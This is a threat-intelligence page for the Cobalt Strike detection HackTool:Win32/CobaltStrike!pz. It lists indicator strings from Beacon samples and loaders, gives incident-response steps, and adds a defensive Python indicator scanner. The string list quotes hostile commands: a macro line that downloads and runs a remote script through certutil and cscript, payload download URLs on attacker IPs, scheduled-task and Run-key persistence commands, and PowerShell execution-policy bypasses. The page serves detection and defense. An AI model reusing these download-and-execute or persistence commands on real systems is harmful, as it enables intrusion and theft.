Concrete signature match: Hack Tool - Tool used to exploit vulnerabilities for 32-bit Windows platform, family CobaltStrike
This signature matches HackTool:Win32/CobaltStrike!pz, indicating a Cobalt Strike Beacon payload, or a loader that carries one, on the system. Cobalt Strike is a commercial adversary-simulation framework whose leaked and cracked builds are widely used in real intrusions. The strings below show what the detected samples can do: persistence (a scheduled task named 'Tencentid' that relaunches C:\Users\Public\Music\tencentsoso.exe every minute, an HKCU Run key written with reg add, and a UserInitMprLogonScript logon script), UAC bypass and elevation, keylogging and screenshots, credential dumping (hashdump, mimikatz), network reconnaissance (netview, portscan), PowerShell execution with -exec bypass -EncodedCommand, and command-and-control over SMB named pipes and HTTP via the WinINet API (HttpSendRequestA, InternetReadFile). The list also covers several loaders that wrap Beacon shellcode (Go, Nim, .NET and VBA macro stagers, some with sandbox checks and AES-decrypted payloads), which is why it mixes framework strings with loader build paths and hard-coded download URLs.
Relevant strings associated with this threat. The tag after each string names the signature type it comes from (PEHSTR/PEHSTR_EXT for strings in PE files, MACROHSTR_EXT for Office macro strings); entries beginning with !#HSTR: reference other string signatures whose matches this detection combines:
- \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
- S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
- C:\Users\Public\Music\cia.plan (PEHSTR)
- !C:\Users\Public\Music\SideBar.dll (PEHSTR)
- artifact64big.dll (PEHSTR_EXT)
- artifact32big.dll (PEHSTR_EXT)
- K[ZKK\OKM (PEHSTR_EXT)
- GetCommandLineA (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
- temp.dll (PEHSTR_EXT)
- ././., (PEHSTR_EXT)
- .,./., (PEHSTR_EXT)
- /posts/ (PEHSTR_EXT)
- /ivc/ (PEHSTR_EXT)
- /k&>}2 (SNID)
- QJM#/I (SNID)
- vN.6b (SNID)
- Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- beacon.dll (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- \\.\pipe\bypassuac (PEHSTR_EXT)
- \\.\pipe\keylogger (PEHSTR_EXT)
- /send%s (PEHSTR_EXT)
- rcap:// (PEHSTR_EXT)
- \\.\pipe\netview (PEHSTR_EXT)
- \\.\pipe\powershell (PEHSTR_EXT)
- \\.\pipe\screenshot (PEHSTR_EXT)
- \\.\pipe\elevate (PEHSTR_EXT)
- \\.\pipe\hashdump (PEHSTR_EXT)
- Global\SAM (PEHSTR_EXT)
- \\.\pipe\portscan (PEHSTR_EXT)
- \\%s\ipc$ (PEHSTR_EXT)
- \\.\pipe\sshagent (PEHSTR_EXT)
- COBALTSTRIKE (PEHSTR_EXT)
- %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
- \\%s\pipe\msagent_%x (PEHSTR_EXT)
- [command] (PEHSTR_EXT)
- \\.\pipe\mimikatz (PEHSTR_EXT)
- test.dll (PEHSTR_EXT)
- shellcodeexecute (PEHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
- AS\e\%r (SNID)
- could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
- spawn::decrypting... (PEHSTR)
- \regedit.exe (PEHSTR)
- tps://122.228.7.225/admin?file= (PEHSTR_EXT)
- 122.193.130.74 (PEHSTR_EXT)
- 121.207.229.145 (PEHSTR_EXT)
- File Download Success. (PEHSTR_EXT)
- download.exe (PEHSTR_EXT)
- /checker (PEHSTR_EXT)
- YG@JG\ (PEHSTR_EXT)
- |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
- HTTP/1.1 200 OK (PEHSTR_EXT)
- %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
- CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
- r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
- /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v (PEHSTR_EXT)
- /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
- 7I.S_T (SNID)
- \>~gZ (SNID)
- shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
- shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
- shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
- sync.(*Mutex).Lock (PEHSTR_EXT)
- crypto/cipher.xorBytes (PEHSTR_EXT)
- shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
- runtime.injectglist (PEHSTR_EXT)
- sync.(*Mutex).lockSlow (PEHSTR_EXT)
- sync.(*entry).load (PEHSTR_EXT)
- shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
- crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
- crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
- crypto/aes.decryptBlockGo (PEHSTR_EXT)
- 0.bin (PEHSTR_EXT)
- \Bypass_AV.pdb (PEHSTR_EXT)
- Bypass_AV.pdb (PEHSTR_EXT)
- InternetReadFile(...) (PEHSTR_EXT)
- HttpSendRequestA(...) (PEHSTR_EXT)
- /htEp (PEHSTR_EXT)
- oshi.at (PEHSTR_EXT)
- UserInitMprLogonScript (PEHSTR_EXT)
- %s as %s\%s: %d (PEHSTR_EXT)
- beacon.x64.dll (PEHSTR_EXT)
- Updater.dll (PEHSTR_EXT)
- Content-Type: application/octet-stream (PEHSTR_EXT)
- cmd /c C:\Windows\Temp (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- \SLN\HRM_SUB\ (PEHSTR_EXT)
- \HRM_SUB.pdb (PEHSTR_EXT)
- AVBypass.pdb (PEHSTR_EXT)
- http_dll.dat (PEHSTR_EXT)
- //rs.qbox.me/chtype/ (PEHSTR_EXT)
- Dbak/chdb:qiniu.png (PEHSTR_EXT)
- 252.72.131.228 (PEHSTR_EXT)
- 240.232.200.0 (PEHSTR_EXT)
- 0.0.65.81 (PEHSTR_EXT)
- 65.80.82.81 (PEHSTR_EXT)
- 86.72.49.210 (PEHSTR_EXT)
- 101.72.139.82 (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- Aborting... (PEHSTR_EXT)
- -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
- Press any key... (PEHSTR_EXT)
- http://144.48.240.85/18.exe (PEHSTR_EXT)
- 4Bejz8txQ/rDnf (PEHSTR_EXT)
- ShellCodeLoader\bin (PEHSTR_EXT)
- http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- \x91\xe1\xa19 (PEHSTR_EXT)
- \xE9\xE8\Xa1 (PEHSTR_EXT)
- 0ZNA3EZ4g.exe (PEHSTR_EXT)
- 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
- legacy.chunk.js (PEHSTR_EXT)
- windows\temp\ (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
- namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
- windows.ini (PEHSTR)
- mgur730yw1.dll (PEHSTR_EXT)
- \Parallel_Asis.dll (PEHSTR_EXT)
- mscorsvc.dll (PEHSTR_EXT)
- 1.dll (PEHSTR_EXT)
- Loader.nim (PEHSTR_EXT)
- bcmode.nim (PEHSTR_EXT)
- Test.dll (PEHSTR_EXT)
- \.\PhysicalDrive0 (PEHSTR_EXT)
- temp\packed64-temp.pdb (PEHSTR_EXT)
- \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
- .sedata (PEHSTR_EXT)
- .gehc (PEHSTR_EXT)
- Release\movenpeak.pdb (PEHSTR_EXT)
- System.Web.ni.dll (PEHSTR_EXT)
- 0cobaltstrike-chtsec (PEHSTR_EXT)
- DetectAttack.dll (PEHSTR_EXT)
- x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
- powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
- nfvurg856lk63.dll (PEHSTR_EXT)
- programdata\3bef479.tmp (PEHSTR_EXT)
- Release\SetupEngine.pdb (PEHSTR_EXT)
- Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
- ;\$ r (PEHSTR_EXT)
- DllMain (PEHSTR_EXT)
- PolicyPlus.Resources.resources (PEHSTR_EXT)
- %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
- enhanced-google.com (PEHSTR_EXT)
- Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
- E2/L9L$@ (PEHSTR_EXT)
- CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
- \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
- QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
- New Project 2.exe (PEHSTR_EXT)
- raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
- .retplne (PEHSTR_EXT)
- wsc_UUIDS.dll (PEHSTR_EXT)
- D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
- on_avast_dll_unload (PEHSTR_EXT)
- peloader\peloader_64\ (PEHSTR_EXT)
- \Release\peloader (PEHSTR_EXT)
- AtomLdr.dll (PEHSTR_EXT)
- A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
- RunScript (PEHSTR_EXT)
- PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
- test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
- WindowsProject_bin.dll (PEHSTR)
- jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
- api.gogleapi.click/file/System/ (PEHSTR_EXT)
- Projects\evasionC_go\workingSpace (PEHSTR_EXT)
- _seh_filter_dll (PEHSTR_EXT)
- \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
- /|bD;X (SNID)
- MACOSX\pdf.pdf (PEHSTR_EXT)
- sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
- nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
- yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
- PT2MtVR9gr5.go (PEHSTR_EXT)
- CallDLLDynamic.pdb (PEHSTR_EXT)
- per_thread_data.cpp (PEHSTR_EXT)
- [*] Executing (PEHSTR_EXT)
- ConsoleApp1.exe (PEHSTR_EXT)
- n/q9) (SNID)
- krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)

Associated sample hash (SHA-256): 647085fbac65f6c32b259d8afa83cbfc68b6b8bc6f6e1e01af21e1bf99edbfea

Recommended response: isolate the affected system from the network immediately. Remove the persistence before the payload: the scheduled task 'Tencentid' fires every minute (/sc minute /MO 1), so delete the task first and then C:\Users\Public\Music\tencentsoso.exe and the other files it references, and also check the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key and the UserInitMprLogonScript value, which the strings above show being used for persistence. Because the detected capabilities include hashdump and mimikatz, treat every credential that was present on the host as exposed: reset all user and service account credentials, and hunt on other hosts for the same named pipes and the C2 addresses and URLs listed above. Conduct a thorough forensic investigation to determine the extent of compromise, and re-image the system rather than rely on spot removal of a post-exploitation implant.
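Added example, not part of this page and not the signature engine that produced the detection: a small Python scanner that applies the page's own indicator strings (the Beacon job pipe names, the Tencentid scheduled-task command, the loader DLL names) to a blob of file content, checking both the ASCII and the UTF-16LE form of each string, plus a helper for triaging live named-pipe names during the response described above. The per-string weights, the threshold, and the generalisation of MSSE-1966-server and msagent_%x into patterns are assumptions; the sample inputs are constructed, not real samples.

```python
"""Indicator scanner built from the strings listed on this page.

Added example, not the signature engine behind the detection. The indicator
strings are copied from the page; the weights and threshold are assumptions
chosen to show why a string-set detection must not fire on generic API names
alone.
"""
import re

# Weighted indicators (weights assumed). Byte strings, because we search raw
# file content; each is also checked in UTF-16LE, the form wide strings take
# in Windows binaries.
INDICATORS = {
    # Beacon post-exploitation job pipes, as listed on the page
    rb"\\.\pipe\bypassuac": 3,
    rb"\\.\pipe\keylogger": 3,
    rb"\\.\pipe\hashdump": 3,
    rb"\\.\pipe\mimikatz": 3,
    rb"\\.\pipe\powershell": 2,
    rb"\\.\pipe\screenshot": 2,
    rb"\\.\pipe\portscan": 2,
    rb"\\.\pipe\netview": 2,
    rb"\\.\pipe\MSSE-1966-server": 4,
    # Persistence and execution strings from the same list
    rb"/Create /TN Tencentid": 5,
    rb"C:\Users\Public\Music\tencentsoso.exe": 5,
    rb"powershell -nop -exec bypass -EncodedCommand": 2,
    rb"UserInitMprLogonScript": 2,
    rb"beacon.dll": 2,
    rb"beacon.x64.dll": 2,
    rb"artifact32big.dll": 2,
    rb"artifact64big.dll": 2,
    # Generic strings found in countless benign binaries: weight 1, so they
    # only add context to a stronger hit and never fire on their own
    rb"GetCommandLineA": 1,
    rb"GetCommandLineW": 1,
    rb"Microsoft Base Cryptographic Provider v1.0": 1,
    rb"HttpAddRequestHeadersA": 1,
}
THRESHOLD = 6  # assumption


def _forms(needle: bytes):
    """Yield the ASCII form and the UTF-16LE form of an indicator."""
    yield needle
    yield needle.decode("ascii").encode("utf-16-le")


def scan_bytes(data: bytes) -> dict:
    """Score a blob of file content against INDICATORS.

    Each indicator counts once even if present in both encodings.
    Returns {"score": int, "hits": [str], "match": bool}.
    """
    hits, score = [], 0
    for needle, weight in INDICATORS.items():
        if any(form in data for form in _forms(needle)):
            hits.append(needle.decode("ascii"))
            score += weight
    return {"score": score, "hits": hits, "match": score >= THRESHOLD}


# Live named-pipe names worth flagging, derived from the pipe strings above.
# The two format strings on the page (MSSE-1966-server, msagent_%x) are
# generalised into patterns on their variable part (an assumption).
PIPE_PATTERNS = [
    re.compile(r"^MSSE-\d+-server$", re.IGNORECASE),
    re.compile(r"^msagent_[0-9a-f]+$", re.IGNORECASE),
    re.compile(r"^(bypassuac|keylogger|netview|powershell|screenshot|elevate|"
               r"hashdump|portscan|sshagent|mimikatz)$", re.IGNORECASE),
]


def flag_pipe_names(names):
    """Return the pipe names that match a Beacon job pipe pattern."""
    # On Windows, during triage: flag_pipe_names(os.listdir(r"\\.\pipe\\"))
    return [n for n in names if any(p.match(n) for p in PIPE_PATTERNS)]


# Constructed sample inputs (not real samples): a blob carrying indicators in
# both ASCII and UTF-16LE, and a benign-looking blob with only generic strings.
SUSPICIOUS_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + rb"\\.\pipe\MSSE-1966-server" + b"\x00"
    + "/Create /TN Tencentid".encode("utf-16-le") + b"\x00\x00"
    + b"beacon.dll\x00GetCommandLineA\x00"
)
BENIGN_BLOB = (
    b"MZ\x90\x00" + b"GetCommandLineA\x00GetCommandLineW\x00"
    + b"Microsoft Base Cryptographic Provider v1.0\x00"
)

if __name__ == "__main__":
    print(scan_bytes(SUSPICIOUS_BLOB))   # score 12, match True
    print(scan_bytes(BENIGN_BLOB))       # score 3, match False
    print(flag_pipe_names(["lsass", "MSSE-4812-server", "msagent_1a2b", "wkssvc"]))
```

The UTF-16LE check matters in practice: the Tencentid task command in the constructed blob is only present as a wide string, and an ASCII-only grep would miss it. The weighting is the other point: the benign blob carries three of the page's strings and still scores below the threshold, because those strings occur in almost every Windows binary.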